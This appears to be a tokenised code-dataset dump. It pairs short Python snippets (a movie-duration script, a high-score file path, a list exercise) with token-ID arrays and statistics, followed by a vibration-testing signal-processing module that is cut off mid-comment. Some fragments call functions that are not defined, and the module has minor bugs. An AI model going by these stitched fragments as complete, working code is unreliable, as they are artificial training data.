from subprocess import Popen, PIPE, STDOUT if __name__=="__main__": import sys path = sys.argv[1] duration = GetMovieDuration(path) FPS = GetMovieFPS(path) print "duration:", duration print "FPS:", FPS
[ 6738, 850, 14681, 1330, 8099, 268, 11, 350, 4061, 36, 11, 48571, 12425, 198, 198, 361, 11593, 3672, 834, 855, 1, 834, 12417, 834, 1298, 198, 220, 220, 220, 1330, 25064, 198, 220, 220, 220, 3108, 796, 25064, 13, 853, 85, 58, 16, 60, 198, 220, 220, 220, 9478, 796, 220, 3497, 25097, 26054, 7, 6978, 8, 198, 220, 220, 220, 22082, 796, 220, 3497, 25097, 37, 3705, 7, 6978, 8, 198, 220, 220, 220, 3601, 366, 32257, 25, 1600, 9478, 198, 220, 220, 220, 3601, 366, 37, 3705, 25, 1600, 22082, 198 ]
2.462366
93
import shelve import os from . import tools MAIN_DIR = os.path.split(os.path.abspath(__file__))[0] SHELVE_PATH = os.path.join(MAIN_DIR, 'high_score.txt')
[ 11748, 7497, 303, 198, 11748, 28686, 198, 6738, 764, 1330, 4899, 198, 198, 5673, 1268, 62, 34720, 796, 28686, 13, 6978, 13, 35312, 7, 418, 13, 6978, 13, 397, 2777, 776, 7, 834, 7753, 834, 4008, 58, 15, 60, 198, 9693, 3698, 6089, 62, 34219, 796, 28686, 13, 6978, 13, 22179, 7, 5673, 1268, 62, 34720, 11, 705, 8929, 62, 26675, 13, 14116, 11537, 628 ]
2.4
65
#Script made for learn diferences on list modification t = [2,1,3,4,5] p = [2,1,3,4,5] chop(p) print(p) print(chop(p)) middle(t) print(t) print(middle(t))
[ 2, 7391, 925, 329, 2193, 288, 361, 4972, 319, 1351, 17613, 201, 198, 201, 198, 83, 796, 685, 17, 11, 16, 11, 18, 11, 19, 11, 20, 60, 201, 198, 79, 796, 685, 17, 11, 16, 11, 18, 11, 19, 11, 20, 60, 201, 198, 201, 198, 354, 404, 7, 79, 8, 201, 198, 4798, 7, 79, 8, 201, 198, 4798, 7, 354, 404, 7, 79, 4008, 201, 198, 201, 198, 27171, 7, 83, 8, 201, 198, 4798, 7, 83, 8, 201, 198, 4798, 7, 27171, 7, 83, 4008, 201, 198, 201, 198, 201, 198 ]
1.831579
95
""" Signal processing, creation and plotting. Analysis of data and generation of simulated experiments. """ __license__ = "Joseph C. Slater" __docformat__ = 'reStructuredText' # import warnings import numpy as np import scipy as sp import scipy.fftpack as fftpack import scipy.linalg as la import matplotlib.pyplot as plt import scipy.integrate as spi import scipy.signal as signal """ Notes: ------ Sept. 3, 2016 Development of windows in scipy.signal has been rapid and determining what I should build into this module, or simply leverage from scipy.signal has been a moving target. It's now apparent that creating or returning a window is pointless. Further, Applying should be a relatively simple code obviating much of any need for the code here. The cross spectrum analysis formerly lacking is now available, periodogram is usually the best option, however not with impulse excitations. See `scipy.signal` for this. Unfortunately, the conventions in this module are not consistent with `scipy.signal`. They follow those of `python-control` FRF calculation is typically trivial, Hv being an expected gap long term MIMO FRF calculation is an open question. Pretty printing of FRFs is always a welcome tool. System ID is likely the remaining missing aspect at this time. In order to be consistent with the Control Systems Library, increasing time or increasing frequency steps positively with increased column number (one dimension). Rows (0 dimension) correspond to appropriate channels, output numbers, etc. For cross spectrum data (cross spectrum density, frequency response function) the 2 dimension represents the input channel. The last dimension (2 or 3) indexes each data instance (experiment). That means that an unaveraged cross spectrum density has dimension 4. If there is only a single input channel, it is imperative to insist the dimention exist, even if only length 1. This is analagous to a vector being Nx1 versus simply a 1-D array of length 1. http://python-control.readthedocs.io/en/latest/conventions.html#time-series-data Problem: This hasn't been fully implemented. """ def window(x, windowname='hanning', normalize=False): r"""Create leakage window. Create a window of length :math:`x`, or a window sized to match :math:`x` that :math:`x\times w` is the windowed result. Parameters ---------- x: integer, float array | If integer- number of points in desired hanning windows. | If array- array provides size of window returned. windowname: string One of: hanning, hamming, blackman, flatwin, boxwin normalize: bool, optional(False) Adjust power level (for use in ASD) to 1 Returns ------- w: float array | window array of size x | window array. Windowed array is then :math:`x\times w` Examples -------- >>> import numpy as np >>> import vibrationtesting as vt >>> import matplotlib.pyplot as plt >>> sample_freq = 1e3 >>> tfinal = 5 >>> fs = 100 >>> A = 10 >>> freq = 5 >>> noise_power = 0.001 * sample_freq / 2 >>> time = np.reshape(np.arange(0, tfinal, 1/sample_freq),(1,-1)) >>> xsin = A*np.sin(2*np.pi*freq*time) >>> xcos = A*np.cos(2*np.pi*freq*time) # assembling individual records. >>> x=np.dstack((xsin,xcos)) # assembling individual records. vstack >>> xw=vt.hanning(x)*x >>> fig, (ax1, ax2) = plt.subplots(2,1) >>> ax1.plot(time.T,x[:,:,1].T) [<matplotlib.lines.Line2D object at ...>] >>> ax1.set_ylim([-20, 20]) (-20, 20) >>> ax1.set_title('Original (raw) data.') Text(0.5,1,'Original (raw) data.') >>> ax1.set_ylabel('$x(t)$') Text(0,0.5,'$x(t)$') >>> ax2.plot(time[0,:],xw[0,:],time[0,:],vt.hanning(x)[0,:]*A,'--', ... time[0,:],-vt.hanning(x)[0,:]*A,'--') [<matplotlib.lines.Line2D object at ...>] >>> ax2.set_ylabel('Hanning windowed $x(t)$') Text(0,0.5,'Hanning windowed $x(t)$') >>> ax2.set_xlabel('time') Text(0.5,0,'time') >>> ax2.set_title('Effect of window. Note the scaling to conserve ASD amplitude') Text(0.5,1,'Effect of window. Note the scaling to conserve ASD amplitude') >>> fig.tight_layout() """ if isinstance(x, (list, tuple, np.ndarray)): """Create Hanning windowing array of dimension `n` by `N` by `nr` where `N` is number of data points and `n` is the number of number of inputs or outputs and `nr` is the number of records.""" swap = 0 if len(x.shape) == 1: # We have either a scalar or 1D array if x.shape[0] == 1: print("x is a scalar... and shouldn\'t have entered this \ part of the loop.") else: N = len(x) f = window(N, windowname=windowname) elif len(x.shape) == 3: if x.shape[0] > x.shape[1]: x = np.swapaxes(x, 0, 1) swap = 1 print('You shouldn\'t do that.') print('The 1 dimension is the time (or frequency) \ incrementing dimension.') print('Swapping axes temporarily to be compliant with \ expectations. I\'ll fix them in your result') N = x.shape[1] f = window(N, windowname=windowname) f, _, _ = np.meshgrid(f, np.arange( x.shape[0]), np.arange(x.shape[2])) if swap == 1: f = np.swapaxes(f, 0, 1) elif len(x.shape) == 2: if x.shape[0] > x.shape[1]: x = np.swapaxes(x, 0, 1) swap = 1 print('You shouldn\'t do that.') print('The 1 dimension is the time (or frequency) ' + 'incrementing dimension.') print('Swapping axes temporarily to be compliant with ' + 'expectations.') print('I\'ll reluctantly return a transposed result.') f = window(x.shape[1], windowname=windowname) f, _ = np.meshgrid(f, np.arange(x.shape[0])) if swap == 1: f = np.swapaxes(f, 0, 1) else: N = x if windowname is 'hanning': f = np.sin(np.pi * np.arange(N) / (N - 1))**2 * np.sqrt(8 / 3) elif windowname is 'hamming': f = (0.54 - 0.46 * np.cos(2 * np.pi * (np.arange(N)) / (N - 1)))\ * np.sqrt(5000 / 1987) elif windowname is 'blackman': print('blackman') f = (0.42 - 0.5 * np.cos(2 * np.pi * (np.arange(N) + .5) / (N)) + .08 * np.cos(4 * np.pi * (np.arange(N) + .5) / (N)))\ * np.sqrt(5000 / 1523) elif windowname is 'flatwin': f = 1.0 - 1.933 * np.cos(2 * np.pi * (np.arange(N)) / (N - 1))\ + 1.286 * np.cos(4 * np.pi * (np.arange(N)) / (N - 1))\ - 0.338 * np.cos(6 * np.pi * (np.arange(N)) / (N - 1))\ + 0.032 * np.cos(8 * np.pi * (np.arange(N)) / (N - 1)) elif windowname is 'boxwin': f = np.ones((1, N)) else: f = np.ones((1, N)) print("I don't recognize window name ", windowname, ". Sorry.") if normalize is True: f = f / la.norm(f) * np.sqrt(N) return f def hanning(x, normalize=False): r"""Return hanning window. Create a hanning window of length :math:`x`, or a hanning window sized to match :math:`x` that :math:`x\times w` is the windowed result. Parameters ---------- x: integer, float array | If integer- number of points in desired hanning windows. | If array- array provides size of window returned. windowname: string One of: hanning, hamming, blackman, flatwin, boxwin normalize: bool, optional(False) Adjust power level (for use in ASD) to 1 Returns ------- w: float array | window array of size x | window array. Windowed array is then :math:`x\times w` Examples -------- >>> import numpy as np >>> import vibrationtesting as vt >>> import matplotlib.pyplot as plt >>> sample_freq = 1e3 >>> tfinal = 5 >>> fs = 100 >>> A = 10 >>> freq = 5 >>> noise_power = 0.001 * sample_freq / 2 >>> time = np.reshape(np.arange(0, tfinal, 1/sample_freq),(1,-1)) >>> xsin = A*np.sin(2*np.pi*freq*time) >>> xcos = A*np.cos(2*np.pi*freq*time) >>> x=np.dstack((xsin,xcos)) # assembling individual records. vstack >>> xw=vt.hanning(x)*x >>> fig, (ax1, ax2) = plt.subplots(2, 1) >>> ax1.plot(time.T,x[:,:,1].T) [<matplotlib.lines.Line2D object at ...>] >>> ax1.set_ylim([-20, 20]) (-20, 20) >>> ax1.set_title('Unwindowed data, 2 records.') Text(0.5,1,'Unwindowed data, 2 records.') >>> ax1.set_ylabel('$x(t)$') Text(0,0.5,'$x(t)$') >>> ax2.plot(time[0,:],xw[0,:],time[0,:],vt.hanning(x)[0,:]*A, ... '--',time[0,:],-vt.hanning(x)[0,:]*A,'--') [<matplotlib.lines.Line2D object at ...>] >>> ax2.set_ylabel('Hanning windowed $x(t)$') Text(0,0.5,'Hanning windowed $x(t)$') >>> ax2.set_xlabel('time') Text(0.5,0,'time') >>> ax2.set_title('Effect of window. Note the scaling to conserve ASD amplitude') Text(0.5,1,'Effect of window. Note the scaling to conserve ASD amplitude') >>> fig.tight_layout() """ if isinstance(x, (list, tuple, np.ndarray)): """Create Hanning windowing array of dimension n by N by nr where N is number of data points and n is the number of number of inputs or outputs and nr is the number of records.""" swap = 0 if len(x.shape) == 1: # We have either a scalar or 1D array if x.shape[0] == 1: print("x is a scalar... and shouldn\'t have \ entered this part of the loop.") else: N = len(x) f = hanning(N) elif len(x.shape) == 3: # print('a') # print(f.shape) if x.shape[0] > x.shape[1]: x = np.swapaxes(x, 0, 1) swap = 1 print('Swapping axes temporarily to be compliant with \ expectations. I\'ll fix them in your result') f = hanning(x.shape[1]) f, _, _ = np.meshgrid(f, np.arange( x.shape[0]), np.arange(x.shape[2])) if swap == 1: f = np.swapaxes(f, 0, 1) elif len(x.shape) == 2: # f,_=np.meshgrid(f[0,:],np.arange(x.shape[0])) # print('b') # print('length = 2') # print(x.shape) if x.shape[0] > x.shape[1]: x = np.swapaxes(x, 0, 1) swap = 1 print('Swapping axes temporarily to be compliant with \ expectations. I\'ll fix them in your result') f = hanning(x.shape[1]) f, _ = np.meshgrid(f, np.arange(x.shape[0])) if swap == 1: f = np.swapaxes(f, 0, 1) else: # print(x) # Create hanning window of length x N = x # print(N) f = np.sin(np.pi * np.arange(N) / (N - 1))**2 * np.sqrt(8 / 3) if normalize is True: f = f / la.norm(f) * np.sqrt(N) return f def blackwin(x): """Return the n point Blackman window. Returns x as the Blackman windowing array x_window The windowed signal is then x*x_window """ print('blackwin is untested') if isinstance(x, (list, tuple, np.ndarray)): n = x.shape[1] f = blackwin(n) if len(x.shape) == 3: f, _, _ = np.meshgrid(f[0, :], np.arange( x.shape[0]), np.arange(x.shape[2])) else: f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0])) else: n = x f = np.reshape((0.42 - 0.5 * np.cos(2 * np.pi * (np.arange(n) + .5)) / (n) + .08 * np.cos(4 * np.pi * (np.arange(n) + .5)) / (n)) * np.sqrt(5000 / 1523), (1, -1)) f = f / la.norm(f) * np.sqrt(n) return f def expwin(x, ts=.75): """Return the n point exponential window. Returns x as the expwin windowing array x_windowed The windowed signal is then x*x_window The optional second argument set the 5% "settling time" of the window. Default is ts=0.75 """ print('expwin is untested') tc = -ts / np.log(.05) if isinstance(x, (list, tuple, np.ndarray)): n = x.shape[1] f = expwin(n) if len(x.shape) == 3: f, _, _ = np.meshgrid(f[0, :], np.arange( x.shape[0]), np.arange(x.shape[2])) else: f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0])) else: n = x v = (n - 1) / n * np.arange(n) + (n - 1) / n / 2 f = np.exp(-v / tc / (n - 1)) f = f / la.norm(f) * np.sqrt(n) f = np.reshape(f, (1, -1)) f = f / la.norm(f) * np.sqrt(n) return f def hammwin(x): """Return the n point hamming window. Returns x as the hamming windowingarray x_windowed The windowed signal is then x*x_window """ print('hammwin is untested') if isinstance(x, (list, tuple, np.ndarray)): n = x.shape[1] f = hammwin(n) if len(x.shape) == 3: f, _, _ = np.meshgrid(f[0, :], np.arange( x.shape[0]), np.arange(x.shape[2])) else: f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0])) else: n = x f = np.reshape((0.54 - 0.46 * np.cos(2 * np.pi * (np.arange(n)) / (n - 1))) * np.sqrt(5000 / 1987), (1, -1)) f = f / la.norm(f) * np.sqrt(n) return f def flatwin(x): """Return the n point flat top window. x_windows=flatwin(x) Returns x as the flat top windowing array x_windowed The windowed signal is then x*x_window McConnell, K. G., "Vibration Testing: Theory and Practice," Wiley, 1995. """ print('flatwin is untested') if isinstance(x, (list, tuple, np.ndarray)): n = x.shape[1] f = flatwin(n) if len(x.shape) == 3: f, _, _ = np.meshgrid(f[0, :], np.arange( x.shape[0]), np.arange(x.shape[2])) else: f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0])) else: n = x f = np.reshape( (1.0 - 1.933 * np.cos(2 * np.pi * (np.arange(n)) / (n - 1)) + 1.286 * np.cos(4 * np.pi * (np.arange(n)) / (n - 1)) - 0.338 * np.cos(6 * np.pi * (np.arange(n)) / (n - 1)) + 0.032 * np.cos(8 * np.pi * (np.arange(n)) / (n - 1))), (1, -1)) f = f / la.norm(f) * np.sqrt(n) return f def boxwin(x): """Return the n point box window (uniform). Returns x as the boxwin windowing array x_windowed The windowed signal is then x*x_window """ print('boxwin is untested') if isinstance(x, (list, tuple, np.ndarray)): n = x.shape[1] f = boxwin(n) if len(x.shape) == 3: f, _, _ = np.meshgrid(f[0, :], np.arange( x.shape[0]), np.arange(x.shape[2])) else: f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0])) else: n = x # f=np.reshape((1.0-1.933*np.cos(2*np.pi*(np.arange(n))/(n-1))+1.286*np.cos(4*np.pi*(np.arange(n))/(n-1))-0.338*np.cos(6*np.pi*(np.arange(n))/(n-1))+0.032*np.cos(8*np.pi*(np.arange(n))/(n-1))),(1,-1)) f = np.reshape(np.ones((1, n)), (1, -1)) f = f / la.norm(f) * np.sqrt(n) return f def hannwin(*args, **kwargs): """Alternative for function `hanning`.""" return hanning(*args, **kwargs) def asd(x, t, windowname="none", ave=bool(True)): """Return autospectrum (power spectrum) density of a signal x. Parameters ---------- x : float array Data array (n x N x m) where n is the number of sensors, m the number of experiments. t : float array Time array (1 x N) windowname : string Name of windowing function to use. See `window`. ave : bool, optional(True) Average result or not? Returns ------- f : float array Frequency vector (1 x N) Pxx : float array Autospectrum (n x N) or (n x N x m) if not averaged. Examples -------- >>> from scipy import signal >>> import numpy as np >>> import matplotlib.pyplot as plt >>> import vibrationtesting as vt >>> import numpy.linalg as la Generate a 5 second test signal, a 10 V sine wave at 50 Hz, corrupted by 0.001 V**2/Hz of white noise sampled at 1 kHz. >>> sample_freq = 1e3 >>> tfinal = 5 >>> sig_freq=50 >>> A=10 >>> noise_power = 0.0001 * sample_freq / 2 >>> noise_power = A/1e12 >>> time = np.arange(0,tfinal,1/sample_freq) >>> time = np.reshape(time, (1, -1)) >>> x = A*np.sin(2*np.pi*sig_freq*time) >>> x = x + np.random.normal(scale=np.sqrt(noise_power), ... size=(1, time.shape[1])) >>> fig, (ax1, ax2) = plt.subplots(2,1) >>> ax1.plot(time[0,:],x[0,:]) [<matplotlib.lines.Line2D object at ...>] >>> ax1.set_title('Time history') Text(0.5,1,'Time history') >>> ax1.set_xlabel('Time (sec)') Text(0.5,0,'Time (sec)') >>> ax1.set_ylabel('$x(t)$') Text(0,0.5,'$x(t)$') Compute and plot the autospectrum density. >>> freq_vec, Pxx = vt.asd(x, time, windowname="hanning", ave=bool(False)) >>> ax2.plot(freq_vec, 20*np.log10(Pxx[0,:])) [<matplotlib.lines.Line2D object at ...>] >>> ax2.set_ylim([-400, 100]) (-400, 100) >>> ax2.set_xlabel('frequency (Hz)') Text(0.5,0,'frequency (Hz)') >>> ax2.set_ylabel('PSD (V**2/Hz)') Text(0,0.5,'PSD (V**2/Hz)') If we average the last half of the spectral density, to exclude the peak, we can recover the noise power on the signal. """ f, Pxx = crsd(x, x, t, windowname=windowname, ave=ave) Pxx = Pxx.real return f, Pxx def crsd(x, y, t, windowname="none", ave=bool(True)): """ Calculate the cross spectrum (power spectrum) density between two signals. Parameters ---------- x, y : arrays Data array (n x N x m) where n is the number of sensors, m the number of experiments. t : array Time array (1 x N) windowname : string Name of windowing function to use. See `window`. ave : bool, optional Average result or not? Returns ------- f : array Frequency vector (1 x N) Pxy : array Autospectrum (n x N) or (n x N x m) if not averaged. Examples -------- >>> from scipy import signal >>> import numpy as np >>> import matplotlib.pyplot as plt >>> import vibrationtesting as vt >>> import numpy.linalg as la Generate a 5 second test signal, a 10 V sine wave at 50 Hz, corrupted by 0.001 V**2/Hz of white noise sampled at 1 kHz. >>> sample_freq = 1e3 >>> tfinal = 5 >>> sig_freq=50 >>> A=10 >>> noise_power = 0.0001 * sample_freq / 2 >>> noise_power = A/1e12 >>> time = np.arange(0,tfinal,1/sample_freq) >>> time = np.reshape(time, (1, -1)) >>> x = A*np.sin(2*np.pi*sig_freq*time) >>> x = x + np.random.normal(scale=np.sqrt(noise_power), ... size=(1, time.shape[1])) >>> fig = plt.figure() >>> plt.subplot(2,1,1) <matplotlib...> >>> plt.plot(time[0,:],x[0,:]) [<matplotlib.lines.Line2D object at ...>] >>> plt.title('Time history') Text(0.5,1,'Time history') >>> plt.xlabel('Time (sec)') Text(0.5,0,'Time (sec)') >>> plt.ylabel('$x(t)$') Text(0,0.5,'$x(t)$') Compute and plot the autospectrum density. >>> freq_vec, Pxx = vt.asd(x, time, windowname="hanning", ave=bool(False)) >>> plt.subplot(2,1,2) <matplotlib...> >>> plt.plot(freq_vec, 20*np.log10(Pxx[0,:])) [<matplotlib.lines.Line2D object at ...>] >>> plt.ylim([-400, 100]) (-400, 100) >>> plt.xlabel('frequency (Hz)') Text(0.5,0,'frequency (Hz)') >>> plt.ylabel('PSD (V**2/Hz)') Text(0,0.5,'PSD (V**2/Hz)') >>> fig.tight_layout() """ # t_shape = t.shape t = t.flatten() if len(t) == 1: dt = t else: dt = t[2] - t[1] if dt <= 0: print('You sent in bad data. Delta t is negative. \ Please check your inputs.') if len(x.shape) == 1: x = np.expand_dims(x, axis=0) x = np.expand_dims(x, axis=2) y = np.expand_dims(y, axis=0) y = np.expand_dims(y, axis=2) n = x.shape[1] if windowname is False or windowname.lower() is "none": win = 1 else: # print('This doesn\'t work yet') windowname = windowname.lower() win = 1 if windowname == "hanning": win = window(x, windowname='hanning') elif windowname == "blackwin": win = window(x, windowname='blackwin') elif windowname == "boxwin": win = window(x, windowname='boxwin') elif windowname == "expwin": win = window(x, windowname='expwin') elif windowname == "hammwin": win = window(x, windowname='hamming') elif windowname == "triwin": win = window(x, windowname='triwin') elif windowname == "flatwin": win = window(x, windowname='flatwin') y = y * win x = x * win del win ffty = np.fft.rfft(y, n, axis=1) * dt fftx = np.fft.rfft(x, n, axis=1) * dt Pxy = np.conj(fftx) * ffty / (n * dt) * 2 if len(Pxy.shape) == 3 and Pxy.shape[2] > 1 and ave: Pxy = np.mean(Pxy, 2) nfreq = 1 / dt / 2 f = np.linspace(0, nfreq, Pxy.shape[1]) # /2./np.pi return f, Pxy def frfest(x, f, dt, windowname="hanning", ave=bool(True), Hv=bool(False)): r"""Return freq, H1, H2, coh, Hv. Estimates the :math:`H(j\omega)` Frequency Response Functions (FRFs) between :math:`x` and :math:`f`. Parameters ---------- x : float array output or response of system f : float array input to system dt : float time step of samples windowname : string One of: hanning, hamming, blackman, flatwin, boxwin ave : bool, optional(True)- currently locked whether or not to average PSDs and ASDs or calculate raw FRFs Hv : bool, optional(False) calculate the :math:`H_v` frequency response function Returns ------- freq : float array frequency vector (1xN) H1 : float array Frequency Response Function :math:`H_1` estimate, (nxN) or (nxNxm) H2 : float array Frequency Response Function :math:`H_2` estimate, (nxN) or (nxNxm) coh : float array Coherance Function :math:`\gamma^2` estimate, (nxN) Hv : float array Frequency Response Function :math:`H_v` estimate, (nxN) or (nxNxm) Currently ``ave`` is locked to default values. Examples -------- >>> import control as ctrl >>> import matplotlib.pyplot as plt >>> import vibrationtesting as vt >>> import numpy as np >>> sample_freq = 1e3 >>> noise_power = 0.001 * sample_freq / 2 >>> A = np.array([[0, 0, 1, 0], ... [0, 0, 0, 1], ... [-200, 100, -.2, .1], ... [100, -200, .1, -.2]]) >>> B = np.array([[0], [0], [1], [0]]) >>> C = np.array([[35, 0, 0, 0], [0, 35, 0, 0]]) >>> D = np.array([[0], [0]]) >>> sys = ctrl.ss(A, B, C, D) >>> tin = np.arange(0, 51.2, .1) >>> nr = .5 # 0 is all noise on input >>> for i in np.arange(520): ... u = np.random.normal(scale=np.sqrt(noise_power), size=tin.shape) ... #print(u) ... t, yout, xout = ctrl.forced_response(sys, tin, u,rtol=1e-12) ... if 'Yout' in locals(): ... Yout=np.dstack((Yout,yout ... +nr*np.random.normal(scale=.050*np.std(yout[0,:]), ... size=yout.shape))) ... Ucomb=np.dstack((Ucomb,u+(1-nr) ... *np.random.normal(scale=.05*np.std(u), ... size=u.shape))) ... else: ... Yout=yout+nr*np.random.normal(scale=.05*np.std(yout[0,:]), ... size=yout.shape) ... # noise on output is 5% scale of input ... Ucomb=u+(1-nr)*np.random.normal(scale=.05*np.std(u), ... size=u.shape)#(1, len(tin))) ... # 5% noise signal on input >>> f, Hxy1, Hxy2, coh, Hxyv = vt.frfest(Yout, Ucomb, t, Hv=bool(True)) >>> vt.frfplot(f,Hxy2,freq_max=3.5, legend=['$H_{11}$', '$H_{12}$']) ... # doctest: +SKIP >>> vt.frfplot(f, np.vstack((Hxy1[0,:], Hxy2[0,:], Hxyv[0,:])), ... legend=['$H_{11-1}$','$H_{11-2}$','$H_{11-v}$']) ... # doctest: +SKIP Notes ----- .. note:: Not compatible with scipy.signal functions .. seealso:: :func:`asd`, :func:`crsd`, :func:`frfplot`. .. warning:: hanning window cannot be selected yet. Averaging cannot be unslected yet. .. todo:: Fix averaging, windowing, multiple input. """ if len(f.shape) == 1: f = f.reshape(1, -1, 1) if len(x.shape) == 1: x = x.reshape(1, -1, 1) if len(f.shape) == 2: if (f.shape).index(max(f.shape)) == 0: f = f.reshape(max(f.shape), min(f.shape), 1) else: f = f.reshape(1, max(f.shape), min(f.shape)) if len(x.shape) == 2: if (x.shape).index(max(x.shape)) == 0: x = x.reshape(max(x.shape), min(x.shape), 1) else: x = x.reshape(1, max(x.shape), min(x.shape)) # Note: Two different ways to ignore returned values shown Pff = asd(f, dt, windowname=windowname)[1] freq, Pxf = crsd(x, f, dt, windowname=windowname) _, Pxx = asd(x, dt) # Note Pfx=conj(Pxf) is applied in the H1 FRF estimation Txf1 = np.conj(Pxf / Pff) Txf2 = Pxx / Pxf # Nulled to avoid output problems/simplify calls if unrequested Txfv = np.zeros_like(Txf1) coh = (Pxf * np.conj(Pxf)).real / Pxx / Pff if Hv: for i in np.arange(Pxx.shape[1]): frfm = np.array( [[Pff[0, i], np.conj(Pxf[0, i])], [Pxf[0, i], Pxx[0, i]]]) alpha = 1 # np.sqrt(Pff[0,i]/Pxx[0,i]) frfm = np.array([[Pff[0, i], alpha * np.conj(Pxf[0, i])], [alpha * Pxf[0, i], alpha**2 * Pxx[0, i]]]) lam, vecs = la.eigh(frfm) index = lam.argsort() lam = lam[index] vecs = vecs[:, index] Txfv[0, i] = -(vecs[0, 0] / vecs[1, 0]) / alpha return freq, Txf1, Txf2, coh, Txfv def frfplot(freq, H, freq_min=0, freq_max=None, type=1, legend=[]): """Frequency Response Function pretty plotting. Plots frequency response functions in a variety of formats Parameters ---------- freq : float array Frequency vector (rad/sec), (1xN) H : float array Frequency response functions (nxN) freq_min : float, optional Low frequency for plot (default 0) freq_min : float, optional High frequency for plot (default max frequency) legend : string array Array of string for use in legend. type : int, optional Plot type. See notes. Returns ------- ax : axis objects allows manipulation of plot parameters (xlabel, title...) Examples -------- >>> import matplotlib.pyplot as plt >>> import vibrationtesting as vt >>> import numpy as np >>> f=np.linspace(0,100,10000).reshape(-1,1); >>> w=f*2*np.pi; >>> k=1e5;m=1;c=1; >>> frf1=1./(m*(w*1j)**2+c*1j*w+k) >>> frf2=1./(m*(w*1j)**2+c*1j*w+k*3) >>> _ = vt.frfplot(f,np.hstack((frf1,frf2)), legend = ['FRF 1','FRF 2']) ... # doctest: +SKIP Notes ----- +---------+------------------------------------------------+ | type | Plot style | +=========+================================================+ | 1 (def) | Magnitude and Phase versus F | +---------+------------------------------------------------+ | 2 | Magnitude and Phase versus log10(F) | +---------+------------------------------------------------+ | 3 | Bodelog (Magnitude and Phase versus log10(w)) | +---------+------------------------------------------------+ | 4 | Real and Imaginary | +---------+------------------------------------------------+ | 5 | Nyquist (Imaginary versus Real) | +---------+------------------------------------------------+ | 6 | Magnitude versus F | +---------+------------------------------------------------+ | 7 | Phase versus F | +---------+------------------------------------------------+ | 8 | Real versus F | +---------+------------------------------------------------+ | 9 | Imaginary versus F | +---------+------------------------------------------------+ | 10 | Magnitude versus log10(F) | +---------+------------------------------------------------+ | 11 | Phase versus log10(F) | +---------+------------------------------------------------+ | 12 | Real versus log10(F) | +---------+------------------------------------------------+ | 13 | Imaginary versus log10(F) | +---------+------------------------------------------------+ | 14 | Magnitude versus log10(w) | +---------+------------------------------------------------+ | 15 | Phase versus log10(w) | +---------+------------------------------------------------+ .. seealso:: `frfest` Copyright J. Slater, Dec 17, 1994 Updated April 27, 1995 Ported to Python, July 1, 2015 """ FLAG = type # Plot type, should libe renamed throughout. freq = freq.reshape(1, -1) lenF = freq.shape[1] if len(H.shape) is 1: H = H.reshape(1, -1) if H.shape[0] > H.shape[1]: H = H.T if freq_max is None: freq_max = np.max(freq) if freq_min is None: freq_min = np.min(freq) if freq_min < np.min(freq): freq_min = np.min(freq) if freq_min > freq_max: raise ValueError('freq_min must be less than freq_max.') # print(str(np.amin(freq))) inlow = int(lenF * (freq_min - np.amin(freq) ) // (np.amax(freq) - np.amin(freq))) inhigh = int(lenF * (freq_max - np.amin(freq) ) // (np.amax(freq) - np.amin(freq)) - 1) # if inlow<1,inlow=1;end # if inhigh>lenF,inhigh=lenF;end """print('freq shape: {}'.format(freq.shape)) print('H shape: {}'.format(H.shape)) print('Index of low frequency: {}'.format(inlow)) print('Index of high frequency: {}'.format(inhigh))""" H = H[:, inlow:inhigh] # print(H.shape) freq = freq[:, inlow:inhigh] mag = 20 * np.log10(np.abs(H)) # print(mag) # print(mag.shape) minmag = np.min(mag) maxmag = np.max(mag) phase = np.unwrap(np.angle(H)) * 180 / np.pi # phmin_max=[min(phase)//45)*45 ceil(max(max(phase))/45)*45]; phmin = np.amin(phase) // 45 * 45.0 phmax = (np.amax(phase) // 45 + 1) * 45 """minreal = np.amin(np.real(H)) maxreal = np.amax(np.real(H)) minimag = np.amin(np.imag(H)) maximag = np.amax(np.imag(H))""" if FLAG is 1: fig, (ax1, ax2) = plt.subplots(2, 1) ax1.plot(freq.T, mag.T) ax1.set_xlabel('Frequency (Hz)') ax1.set_ylabel('Mag (dB)') ax1.grid() ax1.set_xlim(xmax=freq_max, xmin=freq_min) ax1.set_ylim(ymax=maxmag, ymin=minmag) ax2.plot(freq.T, phase.T) ax2.set_xlabel('Frequency (Hz)') ax2.set_ylabel('Phase (deg)') ax2.grid() ax2.set_xlim(xmax=freq_max, xmin=freq_min) ax2.set_ylim(ymax=phmax, ymin=phmin) ax2.set_yticks(np.arange(phmin, (phmax + 45), 45)) fig.tight_layout() if len(legend) > 0: plt.legend(legend) ax = (ax1, ax2) else: print("Sorry, that option isn't supported yet") return ax """# elif FLAG==2: # subplot(2,1,1) # semilogx(F,mag) # xlabel('Frequency (Hz)') # ylabel('Mag (dB)') # grid on # % Fmin,Fmax,min(mag),max(mag) # axis([Fmin Fmax minmag maxmag]) # subplot(2,1,2) # semilogx(F,phase) # xlabel('Frequency (Hz)') # ylabel('Phase (deg)') # grid on # axis([Fmin Fmax phmin_max(1) phmin_max(2)]) # gridmin_max=round(phmin_max/90)*90; # set(gca,'YTick',gridmin_max(1):90:gridmin_max(2)) # elif FLAG==3: # subplot(2,1,1) # mag=20*log10(abs(Xfer)); # semilogx(F*2*pi,mag) # xlabel('Frequency (Rad/s)') # ylabel('Mag (dB)') # grid on # axis([Wmin Wmax minmag maxmag]) # zoom on # subplot(2,1,2) # semilogx(F*2*pi,phase) # xlabel('Frequency (Rad/s)') # ylabel('Phase (deg)') # grid on # axis([Wmin Wmax phmin_max(1) phmin_max(2)]) # gridmin_max=round(phmin_max/90)*90; # set(gca,'YTick',gridmin_max(1):90:gridmin_max(2)) # elseif FLAG==4 # subplot(2,1,1) # plot(F,real(Xfer)) # xlabel('Frequency (Hz)') # ylabel('Real') # grid on # axis([Fmin Fmax minreal maxreal]) # zoom on # subplot(2,1,2) # plot(F,imag(Xfer)) # xlabel('Frequency (Hz)') # ylabel('Imaginary') # grid on # axis([Fmin Fmax minimag maximag]) # zoom on # elseif FLAG==5 # subplot(1,1,1) # imax=round(length(F)*Fmax/max(F)); # imin=round(length(F)*Fmin/max(F))+1; # plot(real(Xfer(imin:imax)),imag(Xfer(imin:imax))) # xlabel('Real') # ylabel('Imaginary') # grid on # zoom on # elseif FLAG==6 # subplot(1,1,1) # mag=20*log10(abs(Xfer)); # plot(F,mag) # xlabel('Frequency (Hz)') # ylabel('Mag (dB)') # grid on # 